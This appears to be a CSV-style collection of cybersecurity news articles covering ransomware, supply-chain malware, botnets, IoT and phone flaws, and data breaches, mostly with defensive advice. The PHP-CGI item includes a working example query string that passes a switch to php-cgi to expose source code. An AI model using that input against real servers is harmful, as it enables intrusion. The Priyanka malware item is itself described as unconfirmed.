Update: Following the DarkSide ransomware attack that forced Colonial to stop the flow of fuel through its pipelines over the weekend, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday published a new advisory urging business to follow security best practices to prevent disruptions, including implementing robust network segmentation between IT and OT networks; regularly testing manual controls; and ensuring that backups are periodically taken and isolated from network connections.
""CISA and the FBI do not encourage paying a ransom to criminal actors,"" the agency said. ""Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. Paying the ransom also does not guarantee that a victim's files will be recovered.""
Android malware 'Priyanka' spreading rapidly through WhatsApp messenger,https://thehackernews.com/2013/07/android-malware-priyanka-spreading.html,"An Android malware is spreading around WhatsApp messenger called 'Priyanka'. It changes all your groups names to Priyanka, and may also change your contact names to Priyanka.
Apparently, the malware doesn't actually harm Android devices, but it is very annoying and it spreads manually, relying on victims to accept and install a contact file from a friend, named ""Priyanka,"". Just in this week this virus started infecting WhatsApp users.
If you receive a contact file from a friend, named 'Priyanka' and install it, your WhatsApp will be infected. If you receive the contact file but don't accept it, nothing will happen.
Follow below steps to remove the virus, if your are infected:
Go to your contacts, search for Priyanka and DELETE it
Go to Settings on your phone
Select Apps or App manager and then select Whatsapp from the list
Tap on Force stop and then on Clear data
Once done. Open Whatsapp on your phone and it'll show up as you've just installed it again.
Go through the setup and in the end it will automatically start restoring your conversations.
So next time when you receive such contacts which you don't expect from your colleagues just discard them.
Update: Website called 'Theandroidsoul' first spotted this malware and claimed existence of this malware. But none antivirus firm or any security professional yet have seen this malware.
Casino Gets Hacked Through Its Internet-Connected Fish Tank Thermometer,https://thehackernews.com/2018/04/iot-hacking-thermometer.html,"Internet-connected technology, also known as the Internet of Things (IoT), is now part of daily life, with smart assistants like Siri and Alexa to cars, watches, toasters, fridges, thermostats, lights, and the list goes on and on.
But of much greater concern, enterprises are unable to secure each and every device on their network, giving cybercriminals hold on their network hostage with just one insecure device.
Since IoT is a double-edged sword, it not only poses huge risks to enterprises worldwide but also has the potential to severely disrupt other organisations, or the Internet itself.
There's no better example than Mirai, the botnet malware that knocked the world's biggest and most popular websites offline for few hours over a year ago.
We have another great example that showcases how one innocent looking insecure IoT device connected to your network can cause security nightmares.
Nicole Eagan, the CEO of cybersecurity company Darktrace, told attendees at an event in London on Thursday how cybercriminals hacked an unnamed casino through its Internet-connected thermometer in an aquarium in the lobby of the casino.
According to what Eagan claimed, the hackers exploited a vulnerability in the thermostat to get a foothold in the network. Once there, they managed to access the high-roller database of gamblers and ""then pulled it back across the network, out the thermostat, and up to the cloud.""
Although Eagan did not disclose the identity of the casino, the incident she was sharing could be of last year, when Darktrace published a report [PDF], referencing to a thermometer hack of this sort on an unnamed casino based in North America.
The adoption of IoT technology raises concerns over new and more imaginative cybersecurity threats, and this incident is a compelling reminder that the IoT devices are theoretically vulnerable to being hacked or compromised.
""There's a lot of internet of things devices, everything from thermostats, refrigeration systems, HVAC [air conditioning] systems, to people who bring in their Alexa devices into the offices,"" said Eagan.
""There's just a lot of IoT. It expands the attack surface and most of this isn't covered by traditional defenses.""
Manufacturers majorly focus on performance and usability of IoT devices but ignore security measures and encryption mechanisms, which is why they are routinely being hacked.
Therefore, people can hardly do anything to protect themselves against these kinds of threats, until IoT device manufacturers timely secure and patch every security flaws or loopholes that might be present in their devices.
The best way you can protect is to connect only necessary devices to the network and place them behind a firewall.
Also, keep your operating systems and software up-to-date, make use of a good security product that protects all your devices within the network, and most importantly, educate yourself about IoT products.
Warning: CCleaner Hacked to Distribute Malware; Over 2.3 Million Users Infected,https://thehackernews.com/2017/09/ccleaner-hacked-malware.html,"If you have downloaded or updated CCleaner application on your computer between August 15 and September 12 of this year from its official website, then pay attention—your computer has been compromised.
CCleaner is a popular application with over 2 billion downloads, created by Piriform and recently acquired by Avast, that allows users to clean up their system to optimize and enhance performance.
Security researchers from Cisco Talos discovered that the download servers used by Avast to let users download the application were compromised by some unknown hackers, who replaced the original version of the software with the malicious one and distributed it to millions of users for around a month.
This incident is yet another example of supply chain attack. Earlier this year, update servers of a Ukrainian company called MeDoc were also compromised in the same way to distribute the Petya ransomware, which wreaked havoc worldwide.
Avast and Piriform have both confirmed that the Windows 32-bit version of CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 were affected by the malware.
Detected on 13 September, the malicious version of CCleaner contains a multi-stage malware payload that steals data from infected computers and sends it to attacker's remote command-and-control servers.
Moreover, the unknown hackers signed the malicious installation executable (v5.33) using a valid digital signature issued to Piriform by Symantec and used Domain Generation Algorithm (DGA), so that if attackers' server went down, the DGA could generate new domains to receive and send stolen information.
""All of the collected information was encrypted and encoded by base64 with a custom alphabet,"" says Paul Yung, V.P. of Products at Piriform. ""The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request.""
The malicious software was programmed to collect a large number of user data, including:
Computer name
List of installed software, including Windows updates
List of all running processes
IP and MAC addresses
Additional information like whether the process is running with admin privileges and whether it is a 64-bit system.
How to Remove Malware From Your PC
According to the Talos researchers, around 5 million people download CCleaner (or Crap Cleaner) each week, which indicates that more than 20 Million people could have been infected with the malicious version the app.
""The impact of this attack could be severe given the extremely high number of systems possibly affected. CCleaner claims to have over 2 billion downloads worldwide as of November 2016 and is reportedly adding new users at a rate of 5 million a week,"" Talos said.
However, Piriform estimated that up to 3 percent of its users (up to 2.27 million people) were affected by the malicious installation.
Affected users are strongly recommended to update their CCleaner software to version 5.34 or higher, in order to protect their computers from being compromised. The latest version is available for download here.
Attackers Can Weaponize Firewalls and Middleboxes for Amplified DDoS Attacks,https://thehackernews.com/2021/08/attackers-can-weaponize-firewalls-and.html,"Weaknesses in the implementation of TCP protocol in middleboxes and censorship infrastructure could be weaponized as a vector to stage reflected denial of service (DoS) amplification attacks against any target, surpassing many of the existing UDP-based amplification factors to date.
Detailed by a group of academics from the University of Maryland and the University of Colorado Boulder at the USENIX Security Symposium, the volumetric attacks take advantage of TCP-non-compliance in-network middleboxes — such as firewalls, intrusion prevention systems, and deep packet inspection (DPI) boxes — to amplify network traffic, with hundreds of thousands of IP addresses offering amplification factors exceeding those from DNS, NTP, and Memcached.
The research, which received a Distinguished Paper Award at the conference, is the first of its kind to describe a technique to carry out DDoS reflected amplification attacks over the TCP protocol by abusing middlebox misconfigurations in the wild, a method previously deemed effective at preventing such spoofing attacks.
Reflected amplification attacks are a type of DoS attacks in which an adversary leverages the connectionless nature of UDP protocol with spoofed requests to misconfigured open servers in order to overwhelm a target server or network with a flood of packets, causing disruption or rendering the server and its surrounding infrastructure inaccessible. This typically occurs when the response from the vulnerable service is larger than the spoofed request, which can then be leveraged to send thousands of these requests, thereby significantly amplifying the size and bandwidth issued to the target.
While DoS amplifications are traditionally UDP-based owing to complications arising out of TCP's three-way handshake to set up a TCP/IP connection over an IP based network (SYN, SYN+ACK, and ACK), the researchers found that a large number of network middleboxes do not conform to the TCP standard, and that they can ""respond to spoofed censored requests with large block pages, even if there is no valid TCP connection or handshake,"" turning the devices into attractive targets for DoS amplification attacks.
""Middleboxes are often not TCP-compliant by design: many middleboxes attempt [to] handle asymmetric routing, where the middlebox can only see one direction of packets in a connection (e.g., client to server),"" the researchers said. ""But this feature opens them to attack: if middleboxes inject content based only on one side of the connection, an attacker can spoof one side of a TCP three-way handshake, and convince the middlebox there is a valid connection.""
Put differently, the mechanism hinges on tricking the middlebox into injecting a response without completing the three-way handshake, subsequently using it to access a forbidden domain such as pornography, gambling, and file sharing sites, causing the middlebox to respond with a block page, which would be much larger than the censored requests, thus resulting in an amplification.
What's more, not only do these amplified responses come predominantly from middleboxes, a chunk of those network inspection equipment are nation-state censorship apparatus, highlighting the role played by such infrastructure in enabling governments to suppress access to the information within their borders, and worse, allow adversaries to weaponize the networking devices to attack any victim on the internet.
""Nation-state censorship infrastructure is located at high-speed ISPs, and is capable of sending and injecting data at incredibly high bandwidths,"" the researchers said. ""This allows an attacker to amplify larger amounts of traffic without worry of amplifier saturation. Second, the enormous pool of source IP addresses that can be used to trigger amplification attacks makes it difficult for victims to simply block a handful of reflectors. Nation-state censors effectively turn every routable IP addresses (sic) within their country into a potential amplifier.""
""Middleboxes introduce an unexpected, as-yet untapped threat that attackers could leverage to launch powerful DoS attacks,"" the researchers added. ""Protecting the Internet from these threats will require concerted effort from many middlebox manufacturers and operators.""
Un-Patched PHP-CGI remote code execution vulnerability can expose Source Codes,https://thehackernews.com/2012/05/un-patched-php-cgi-remote-code.html,"Un-Patched PHP-CGI remote code execution bug can expose Source Codes
A serious remote code execution vulnerability in PHP-CGI disclosed. PHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files. The developers were still in the process of building the patch for the flaw when it was disclosed Wednesday, But the vulnerability can only be exploited if the HTTP server follows a fairly obscure part of the CGI spec.
According to advisory (CVE-2012-1823) , PHP-CGI installations are vulnerable to remote code execution. You can pass command-line arguments like the ""-s"" switch ""show source"" to PHP via the query string. For example, You could see the source via ""https://localhost/test.php?-s"" . A remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.
The team that found the bug, known as Eindbazen. They said that it had been waiting for several months for the PHP Group to release a patch for the vulnerability in order to publish information about the bug.
What this vulnerability can do ? It can help attacker to find out database passwords, file locations etc and Execute any file on the server's local disk. Most important , using some trick if you have the possibility to upload a file to the server, execute any code.
So, When PHP is used in a CGI-based setup the php-cgi receives a processed query string parameter as command line arguments which allows command-line switches, such as -s, -d or -c to be passed to the php-cgi binary, which can be exploited to disclose source code and obtain arbitrary code execution.
South Korean Nuclear Power Plant Hacked,https://thehackernews.com/2014/12/Korea-nuclear-power-plant-hacked.html,"Koreans have once again gain media attention but this time not as an accused of any kind of hack attack, but as a victim of a severe attack on computers systems at a nuclear power plant in South Korea by an unknown hacker or a group.
South Korea was hit by a cyber attack on its nuclear power plant, causing the operator to conduct drills in order to test the ability of the nuclear plant to cope with a full-scale cyber-attack. Although the plant's operator says no critical data has been leaked.
The cyber attack came into light after a hacker posted blueprints of nuclear reactors online and threatened further ""leaks"" unless authorities close down the reactors. According to the South Korean Yonhap News Agency, the hacker was able to access blueprints of reactors, floor maps and other internal information on the plant.
Last week with the help of a Twitter account named ""president of anti-nuclear reactor group,"" the hacker posted leaked data revealing internal designs and manuals of the Gori-2 and Wolsong-1 nuclear reactors run by Korea Hydro and Nuclear Power Co. (KHNP). The hacker also threatened to leak more information unless the reactors are shut down.
The leaked information includes important data on the facilities' air condition and cooling systems, a radiation exposure report, and personal data of employees.
While KHNP and the South Korean government said that only ""non-critical"" information was stolen by the hacker and that the compromised data did not harm the nuclear plant's safety. The company will also conduct extensive drills at four of its complexes next week.
The KHNP, the sole nuclear operator in Korea, manages South Korea's 23 nuclear reactors, which supply about 30 percent of the country's electricity needs.
The hack came after the massive cyber attack on Sony Pictures Entertainment earlier this month, in which a list of personal and confidential data of the company made online by the hackers group called itself Guardian of Peace (GoP). The hack has yet exposed about 200 gigabytes of confidential data from upcoming movie scripts to sensitive employees data, celebrities phone numbers and their travel aliases, and unreleased films, marking it as the most severe hack in the History.
The Federal Bureau of Investigation (FBI) accused North Korea for Sony hack due to the Sony's upcoming controversial movie ""The Interview"" — a comedy about an assassination attempt against North Korean leader Kim Jong-un. Although North Korea denied any involvement.
In the past, South Korea has also many times blamed North Korea for hacks on banks, government websites and broadcasters. But this time no one has blamed North Korea for the hacking against the KHNP power plants. An official at KHNP told Reuters that the hacking appeared to be the work of ""elements who want to cause social unrest,"" but added that he had no one specific in mind.
Meanwhile, a Twitter account claiming to represent an anti-nuclear organisation based in Hawaii claimed responsibility for the Nuclear power plant hack in South Korea, although the identities of the intruders have yet to be confirmed.
Slack Resets Passwords For Users Who Hadn't Changed It Since 2015 Breach,https://thehackernews.com/2019/07/slack-password-data-breach.html,"If you use Slack, a popular cloud-based team collaboration server, and recently received an email from the company about a security incident, don't panic and read this article before taking any action.
Slack has been sending a ""password reset"" notification email to all those users who had not yet changed passwords for their Slack accounts since 2015 when the company suffered a massive data breach.
For those unaware, in 2015, hackers unauthorisedly gained access to one of the company's databases that stored user profile information, including their usernames, email addresses, and hashed passwords.
At that time, attackers also secretly inserted code, probably on the login page, which allowed them to capture plaintext passwords entered by some Slack users during that time.
However, immediately following the security incident, the company automatically reset passwords for those small number of Slack users whose plaintext passwords were exposed, but asked other affected users to change their passwords manually.
Keep calm and change your password 😊
Slack is resetting the passwords for all those users (approximately 1% of total) who hadn't changed their passwords since 2015 when the company experienced a #databreach leaking users' credentialshttps://t.co/k6jSBgloAX
Check this thread: https://t.co/Fo7QbI9pOv
— The Hacker News (@TheHackersNews) July 18, 2019
Now in its latest statement released today, the company said they learned about a new list of username and password combinations that match with the login credentials of its users who did not change their password after the 2015 data breach.
""We were recently contacted through our bug bounty program with information about potentially compromised Slack credentials,"" Slack states.
""We immediately confirmed that a portion of the email addresses and password combinations were valid, reset those passwords, and explained our actions to the affected users.""
The latest security incident only affects users, who:
created an account before March 2015,
have not changed their password since the incident, and
accounts that do not require logging in via a single-sign-on (SSO) provider.
The company is not exactly aware of the source of this new leaked plaintext credentials, but suggests it could be the ""result of malware attack or password reuse between services.""
It is also possible that someone might have successfully cracked hashed passwords that were leaked in the 2015 data breach, even when it was protected using the bcrypt algorithm with a randomly generated salt per-password.
Late last month, Slack also sent a separate notification to all the affected users informing them about the potential compromise of their credentials without providing any details of the incident, but it seems many users ignored the warning and did not change their passwords voluntarily.
Therefore, now Slack has automatically reset passwords on affected accounts, that are about 1% of the total registered users, that haven't been updated since 2015 as a precautionary measure, asking them to set a new password using this guide.
""We have no reason to believe that any of these accounts were compromised, but we believe that this precaution is worth any inconvenience the reset may cause,"" the company said.
Besides your changing password, you are also recommended to enable two-factor authentication for your Slack accounts, even if you are not affected.
Slack is still investigating the latest security incident and promises to share more information as soon as they are available.
Tor Anonymizing network overload caused by Mevade Botnet,https://thehackernews.com/2013/09/Mevade-Botnet-Tor-anonymizing-network.html,"Recently, Tor Project Director - Roger Dingledine described a sudden increase in Tor users on the Tor Network after the events related to disclosure of the PRISM surveillance program, Since August 19, 2013, there has been an impressive growth in the number of Tor users.
At first, No one knew who or what is responsible for this spontaneous growth of Tor users, but Security researchers at Fox-IT firm found evidence that the spike in Tor traffic is caused by a Mevade Botnet, that hides its Command-and-Control server in the anonymizing network.
The security firm documented the presence of the Mevade malware architecture based on the anonymizing network, ""The malware uses a command and control connectivity via Tor .Onion links using HTTP. While some bots continue to operate using the standard HTTP connectivity, some versions of the malware use a peer-to-peer network to communicate (KAD based).""
""Typically, it is fairly clear what the purpose of malware is, such as banking, click fraud, ransomware or fake anti-virus malware. In this case however it is a bit more difficult. It is possible that the purpose of this malware network is to load additional malware onto the system and that the infected systems are for sale. "" States the blog post.
The benefit of using Tor network is to hide C&C servers, that allow criminals to build a bulletproof architecture. It was September, 2012 when the German security firm GData Software detected a Botnet with a particular feature, it was controlled from an Internet Relay Chat (IRC) server running as a hidden service of the Tor.
The main advantages of Botnet based on Tor are:
The botnet traffic is encrypted, which helps prevent detection by network monitors.
By running as an Hidden Service, the origin, location, and nature of the C&C are concealed and therefore not exposed to possible takedowns. In addition, since Hidden Services do not rely on public-facing IP addresses, they can be hosted behind firewalls or NAT-enabled devices such as home computers.
Hidden Services provides a Tor-specific .Onion pseudo top-level domain, which is not exposed to possible sinkholing.
The operator can easily move around the C&C servers just by re-using the generated private key for the Hidden Service.
Researches linked the bot agent to the Mevade malware family. ""A recent detection name that has been used in relation to this botnet is 'Mevade.A', but older references suggest the name 'Sefnit', which dates back to at least 2009 and also included Tor connectivity. We have found various references that the malware is internally known as SBC to its operators.""
Authors of Mevade Tor variant appear to use the Russian Language. One of them is known as ""Scorpion"" and with his colleague having nickname ""Dekadent"" probably are the part of an organized cyber gang.
The monetization schema implemented by cybercriminals is not sure, probably their primary intent is install adware and toolbars on victim's systems. According TrendMicro Security expert the Mavade malware has also a ""backdoor component and communicates over SSH to remote hosts"" and the botnet could be used for data theft.
It is possible that the purpose of this malware network is to load additional malware onto the system and that the infected systems are for sale.
Members of the Tor Project have begun an investigation and explained in a blog post, ""The fact is, with a growth curve like this one, there's basically no way that there's a new human behind each of these new Tor clients. These Tor clients got bundled into some new software which got installed onto millions of computers pretty much overnight. Since no large software or operating system vendors have come forward to tell us they just bundled Tor with all their users, that leaves me with one conclusion: somebody out there infected millions of computers and as part of their plan they installed Tor clients on them,""
""It doesn't look like the new clients are using the Tor network to send traffic to external destinations (like websites). Early indications are that they're accessing hidden services — fast relays see ""Received an ESTABLISH_RENDEZVOUS request"" many times a second in their info-level logs, but fast exit relays don't report a significant growth in exit traffic. One plausible explanation (assuming it is indeed a botnet) is that its running its Command and Control (C&C) point as a hidden service.""
Tor users are advised to upgrade to the newest version of Tor to mitigate the effect of the Botnet, it in fact includes a new handshake feature which Tor relays prioritize over the older handshake. The upgrade will advantage legitimate new clients ever the ones who use the older version exploited by an actual variant of Mevade malware.
Of course it is a palliative and not curative, the authors of the botnet may decide to update their Tor component too, that is the reason why Tor official also appealed security community to deeply analyze the botnet to shutdown it.
"Facebook temporarily blocked access from TOR, but not Intentionally",https://thehackernews.com/2013/06/facebook-temporarily-blocked-access.html,"Tor has become a tool of free expression in parts of the world where citizens can not speak freely against their government. On Tuesday, a number of users have noticed that Facebook is blocking connections from the Tor network.
Tor is a free tool that keeps Web browsing sessions private and anonymous. For activists and political dissidents who use the Internet to communicate with the outside world in countries where doing so is a crime, being unable to login to Facebook using TOR posed a huge problem.
Later, Facebook resolves the Tor issues and said that A high volume of malicious activity across Tor exit nodes triggered Facebook's automated malware detection system, which temporarily blocked visitors who use the Tor anonymity service to access the social network.
The role that Tor and Facebook played in facilitating the dissemination of information under restrictive regimes cannot be underestimated. Security researchers are also frequent users of Tor, for instance to hide their location when investigating malicious activity on the Internet.
By giving people the power to share, we are starting to see people make their voices heard on a different scale from what has historically been possible. These voices will increase in number and volume. They cannot be ignored.
Popular PlayStation and Xbox Gaming Forums Hacked; 2.5 Million Users' Data Leaked,https://thehackernews.com/2017/01/gaming-forum-hacking.html,"Do you own an account on one of the two hugely popular PlayStation and Xbox gaming forums?
Your details may have been exposed, as it has been revealed that the two popular video gaming forums, ""XBOX360 ISO"" and ""PSP ISO,"" has been hacked, exposing email addresses, account passwords and IP addresses of 2.5 Million gamers globally.
The attackers hacked and breached both ""XBOX360 ISO"" and ""PSP ISO"" forums in September 2015, but the details of this massive hack just emerge, reports The Sun.
Mostly gamers who look for free versions of popular games are members of these two gaming forums, which provide download links for gaming ISO files – digital copies of online video games lifted from physical game disks – to the owners of Microsoft's Xbox 360 and Sony's Playstation Portable.
Visiting such forum websites and downloading games through the provided links often involve an illegal breach of copyright.
So, if you are one of those gamers using both forum or one of these forums, you are being advised to review your account and change the password for all of your accounts immediately.
Although the hackers behind the attacks are still unknown, it is believed that they dumped the stolen data once they've made enough money by selling the leaked information within private dark web trading sites.
Here's What Gamers Can Do:
Like I always advise, change your passwords for your forum accounts as well as other online accounts immediately, especially if you use the same password for multiple websites.
The reason behind the data breach took so long to emerged is 'Password Reuse.' Your habit of reusing your same email/password combination across multiple services gives hackers opportunity to use the same credentials gathered from one breach to break into your other accounts.
So stop reusing passwords across multiple sites. If it's difficult for you to remember and create complex passwords for different services, you can make use of a good password manager.
We have listed some best password managers that could help you understand the importance of password manager and choose one according to your requirement.
Chinese Hackers Using Firefox Extension to Spy On Tibetan Organizations,https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html,"Cybersecurity researchers today unwrapped a new campaign aimed at spying on vulnerable Tibetan communities globally by deploying a malicious Firefox extension on target systems.
""Threat actors aligned with the Chinese Communist Party's state interests delivered a customized malicious Mozilla Firefox browser extension that facilitated access and control of users' Gmail accounts,"" Proofpoint said in an analysis.
The Sunnyvale-based enterprise security company pinned the phishing operation on a Chinese advanced persistent threat (APT) it tracks as TA413, which has been previously attributed to attacks against the Tibetan diaspora by leveraging COVID-themed lures to deliver the Sepulcher malware with the strategic goal of espionage and civil dissident surveillance.
The researchers said the attacks were detected in January and February 2021, a pattern that has continued since March 2020.
The infection chain begins with a phishing email impersonating the ""Tibetan Women's Association"" using a TA413-linked Gmail account that's known to masquerade as the Bureau of His Holiness the Dalai Lama in India.
The emails contain a malicious URL, supposedly a link to YouTube, when in fact, it takes users to a fake ""Adobe Flash Player Update"" landing page where they are prompted to install a Firefox extension that Proofpoint calls ""FriarFox.""
For its part, the rogue extension — named ""Flash update components"" — disguises itself as an Adobe Flash-related tool, but the researchers said it's largely based on an open-source tool named ""Gmail Notifier (restartless)"" with significant alterations that add malicious capabilities, including incorporating modified versions of files taken from other extensions such as Checker Plus for Gmail.
The timing of this development is no coincidence, as Adobe officially began blocking Flash content from running in browsers starting January 12 following the rich multimedia format's end-of-life on December 31, 2020.
Interestingly, it appears that the operation is targeting only users of Firefox Browser who are also logged in to their Gmail accounts, as the add-on is never delivered in scenarios when the URL in question is visited on a browser such as Google Chrome or in cases where the access happens via Firefox, but the victims don't have an active Gmail session.
""In recent campaigns identified in February 2021, browser extension delivery domains have prompted users to 'Switch to the Firefox Browser' when accessing malicious domains using the Google Chrome Browser,"" the researchers said.
Once installed, the extension, besides having access to browser tabs and user data for all websites, comes equipped with features to search, read, and delete messages and even forward and send emails from the compromised Gmail account.
Additionally, FriarFox also contacts an attacker-controlled server to retrieve a PHP and JavaScript-based payload called Scanbox.
Scanbox is a reconnaissance framework that enables attackers to track visitors to compromised websites, capture keystrokes, and harvest data that could be used to enable follow-on compromises. It has also been reported to have been modified in order to deliver second-stage malware on targeted hosts.
Campaigns using Scanbox were previously spotted in March 2019 by Recorded Future targeting visitors to the website of Pakistan's Directorate General of Immigration and Passports (DGIP) and a fake typosquatted domain claiming to be the official Central Tibetan Administration (CTA).
The introduction of the FriarFox browser extension in TA413's arsenal points to APT actors' ""insatiable hunger"" for access to cloud-based email accounts, says Sherrod DeGrippo, Proofpoint's senior director of threat research and detection.
""The complex delivery method of the tool [...] grants this APT actor near total access to the Gmail accounts of their victims, which is especially troubling as email accounts really are among the highest value assets when it comes to human intelligence,"" DeGrippo noted.
""Almost any other account password can be reset once attackers have access to someone's email account. Threat actors can also use compromised email accounts to send email from that account using the user's email signature and contact list, which makes those messages extremely convincing.""
Cryptome Webpages infected with Blackhole exploit kit,https://thehackernews.com/2012/02/cryptome-webpages-infected-with.html,"Cryptome Webpages infected with Blackhole exploit kit
Cryptome.org a popular website and similar to Wikileaks was hacked by the cybercriminals & Attackers were able to hide malicious scripts on every one of the site's 6,000 pages. Anyone visiting with a vulnerable browser will have found themselves infected with Blackhole, most likely adding their computer to a larger bot.
Cryptome attack, website owners only know they have a problem when users contact them with the bad news after detecting it with security software wise to its many techniques for staying out of sight. Cryptome official write, ""A reader reported today that accessing a file on Cryptome caused this intrusion warning"" and ""Replacement with clean files is proceeding, probably done by end of day.""
Two years ago, the organisation published Microsoft's secret Global Criminal Compliance handbook, which laid out how the company was gathering certain data from users of some of its services that could be accessed by the police and intelligence services.
Europol and IT Security Companies Team Up to Combat Ransomware Threat,https://thehackernews.com/2016/07/ransomware-decrypt-tool.html,"No More Ransom, so is the Ransomware Threat.
The European Police agency Europol has joined forces with police and cyber security companies to launch a worldwide initiative to combat and tackle together the exponential growth of Ransomware used by cyber criminals.
Europol announced today the initiative, dubbed NO More Ransom, that has been backed by technology giant Intel, cyber security firm Kaspersky Lab and the Netherlands police, aiming at decreasing an ""exponential"" rise in Ransomware threat.
Ransomware is a piece of malware that typically locks victim's device using encryption and demands a fee to decrypt the important data. The estimated number of ransomware victims tripled in the first quarter of this year alone.
""For a few years now ransomware has become a dominant concern for EU law enforcement,"" said Europol's deputy director Wil van Gemert. ""We expect to help many people to recover control over their files, while raising awareness and educating the population on how to maintain their devices clean from malware.""
No More Ransom
This No More Ransom initiative informs the public about the dangers of ransomware threat, how to avoid falling victim to it and how to recover data without paying money to cyber-criminals if a person or company falls for one.
Also Read: Ransomware attacks on Hospitals put Patients at Risk
The new No More Ransom online portal provides users with downloadable tools that may help decrypt computers affected by ransomware attacks.
In its initial stage, NoMoreRansom.org contains four decryption tools for ransomware, including the notorious CryptXXX and the CoinVault and Bitcryptor families.
""We can only change the situation if we coordinate our efforts to fight against ransomware,"" said Jornt van der Wiel, security researcher at Kaspersky.
The portal also provides a ""Crytpo Sherrif"" section that allows people to upload more ransomware malware samples and a description to identify the type of ransomware threat affecting a system.
We saw an enormous rise in Ransomware, both in numbers and sophistication. The latest version of Cerber ransomware is so sophisticated that it generates a different sample in every 15 seconds to bypass signature-based antivirus software.
Must Read: Ransomware attacks Shuts Down Electric and Water Utility
One of the best advice to keep yourself safe from this emerging threat, is to backup all your important data regularly. Don't pay criminals the ransom, as it motivates them to keep on infecting a large number of people.
Some organizations have paid cyber criminal's demands, including the University of Calgary in Alberta, which paid $20,000 ransom to decrypt its computer systems' files and restore access to its own email system after getting hit by a ransomware infection.
In addition, you are always advised to keep your software up-to-date, use a reputed antivirus solution, and trust no one while opening any email or message attachments.
Samsung Flaw Lets Hacker Easily Take Control of Your Galaxy Mobile Remotely,https://thehackernews.com/2015/06/hacking-samsung-mobile.html,"More than 600 Million users of Samsung Galaxy smartphones, including the newly released Galaxy S6, are potentially vulnerable to a software bug that allows hackers to secretly monitor the phone's camera and microphone, read text messages and install malicious apps.
The vulnerability is due to a problem with the Samsung built-in keyboard app that enables easier predictive text.
One of the keyboard app version, SwiftKey IME, that comes prepackaged with Samsung's latest Galaxy smartphones could allow a malicious hacker to remotely execute code on user's phone even when if they are not using the keyboard app.
Users cannot get rid of this Flaw
The app cannot be uninstalled or disabled by the users of the Samsung smartphone devices, so it is up to Samsung to fix the critical bug.
The vulnerability was discovered by NowSecure mobile security researcher Ryan Welton, who notified Samsung about the bug in December last year.
The keyboard app periodically prompts a server whether it needs any updating, but Samsung devices do not encrypt the executable file, making it possible for any hacker to modify the traffic via an insecure Wi-Fi connection and send a malicious payload to a phone in order to gain control of it.
This process is usually known as a Man in the Middle or MITM attack, and encryption is often used to stop malicious hackers from exploiting them.
Swift has high privileges in the system, which means it can write files in a phone's memory and can access most of its functions.
If exploited, the flaw could let an attacker to surreptitiously install malware on a user's smartphone; ac
cess the phone's microphone, camera and GPS; eavesdrop on text messages and calls; modify the behavior of other apps and even steal photographs and text messages from the phone.
The hacking attack was demonstrated Tuesday at the Blackhat security conference in London by Welton, and the video of his exploit is given below:
Affected Devices
There is a good news and a bad — The good news is that Samsung has started providing a fix to carrier network operators in early 2015, but the bad news is that the carriers have failed to offer security updates in a timely manner.
It is not known how many network operators actually provided the patches to their users, but the list of potentially vulnerable smartphone devices is a scary one.
The vulnerable devices include Samsung Galaxy S6, Galaxy S5, Galaxy S4 and Galaxy S4 mini on major United States carriers, including Verizon, AT&T, Sprint, and T-Mobile.
The Only Workaround:
As I said the vulnerable Keyboard app can not be uninstalled or disabled, so the only workaround for Galaxy handset owners is to stay away from unsecured Wi-Fi networks, until Samsung fixes the issue in a few days time.
The company said it will release a patch in the next few days, which will be accessible through its service Samsung Knox. The fix will be provided in the form of a security policy update that can be easily downloaded onto the smartphones.
""Samsung takes emerging security threats very seriously,"" the company said in a statement. Besides the security policy update, ""we are also working with Swiftkey to address potential risks going forward.""
Meanwhile, Swift said the flaw doesn't affect the SwiftKey applications on Google Play Store of Android or the iTunes App Store of Apple.
""We supply Samsung with the core technology that powers the word predictions in [Samsung] keyboard,"" Swift said. ""It appears that the way this technology was integrated with Samsung devices introduced the security vulnerability.""
Swift also claims the bug is ""not easy to exploit."" As in order to exploit this flaw, a user must be connected to a malicious wireless network and the user's keyboard is conducting a language update.
For a more detailed technical explanation of the Samsung keyboard vulnerability, go here.
Impossible Google Search Queries,https://thehackernews.com/2013/02/google-seach-engine-flaw-impossible.html,"Anonymous user asked a question on Quora that, How and Why Google is showing p*rn results in when one type equation -4^(1/4) into Google search query ? This is really a very strange bug on Google.
Just after that Jeremy Hoffman, Google software engineer replied him, ""Hi, I'm a Google search engineer. Anon User and Anon User did some excellent analysis. As a web search query, [-4^(1/4)] is interpreted like [-4 ""1 4""], as in ""Find me pages which contain a 1 next to a 4, but which do not contain a 4."" This should return zero results, because it is impossible to satisfy both requirements.""
The bug was apparently uncovered via when user tried to use Google for solving mathematical equations, but the search engine misinterpret his queries. Because it was a combination of impossible questions Google brings back p*rn sites results, any Logic ?
Some similar example Queries are:
-s ""s 2″
-3 ""1 3″
-title ""title 4″
-4 ""1 4″
How -s ""s 2″ a impossible query ? According to Google advance search options,when one is asking for -s ""s 2″, it means you're asking Google to find pages that have the letter S on them but which don't have the letter S in a phrase like ""s 2."" It should be impossible to find a match for this.
Even my Safe Results option is enables in search preference, I still can see these p*rn results as shown above:
""However, we have uncovered a bug that causes some web pages to ""match"" these contradictory queries. Since these are the only results that ""match"" the query, they are the results that get shown. We are working on a bug fix."" Jeremy also said.
As always Google said, A team of highly trained monkeys has been dispatched to deal with this situation.
Hyatt Hotel Says Payment Systems Hacked with Credit-Card Stealing Malware,https://thehackernews.com/2015/12/hyatt-hotel-hack.html,"Hyatt Hotels Corporation is notifying its customers that credit card numbers and other sensitive information may have been stolen after it found malware on the computers that process customer payments.
""We recently identified malware on computers that operate the payment processing systems for Hyatt-managed locations,"" the company announced on Wednesday. ""As soon as we discovered the activity, we launched an investigation and engaged leading third-party cyber security experts.""
What type of information?
The company didn't confirm whether the attackers succeeded in stealing payment card numbers, neither it say how long its network was infected or how many hotel chains were affected in the malware attack.
But as the payment processing system was infected with credit-card-stealing malware, there is a possibility that hackers may have stolen credit card numbers and other sensitive information.
What happened?
Hyatt spokeswoman Stephanie Sheppard said the company discovered malware on 30 November but did not justify why the company waited over three weeks to report the incident.
